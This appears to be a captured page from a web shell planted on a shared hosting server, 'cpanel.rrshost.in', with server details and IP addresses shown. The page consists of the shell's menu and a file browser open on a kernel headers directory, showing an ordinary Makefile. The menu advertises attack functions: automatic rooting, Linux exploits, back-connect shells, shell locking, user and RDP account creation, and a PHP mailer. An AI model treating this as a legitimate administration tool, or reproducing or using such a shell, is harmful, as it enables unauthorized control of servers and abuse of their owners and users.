Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.241.241
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
drivers /
platform /
[ HOME SHELL ]
Name
Size
Permission
Action
chrome
[ DIR ]
drwxr-xr-x
goldfish
[ DIR ]
drwxr-xr-x
mellanox
[ DIR ]
drwxr-xr-x
mips
[ DIR ]
drwxr-xr-x
olpc
[ DIR ]
drwxr-xr-x
surface
[ DIR ]
drwxr-xr-x
x86
[ DIR ]
drwxr-xr-x
Kconfig
357
B
-rw-r--r--
Makefile
334
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for linux/drivers/platform # obj-$(CONFIG_X86) += x86/ obj-$(CONFIG_MELLANOX_PLATFORM) += mellanox/ obj-$(CONFIG_MIPS) += mips/ obj-$(CONFIG_OLPC_EC) += olpc/ obj-$(CONFIG_GOLDFISH) += goldfish/ obj-$(CONFIG_CHROME_PLATFORMS) += chrome/ obj-$(CONFIG_SURFACE_PLATFORMS) += surface/
Close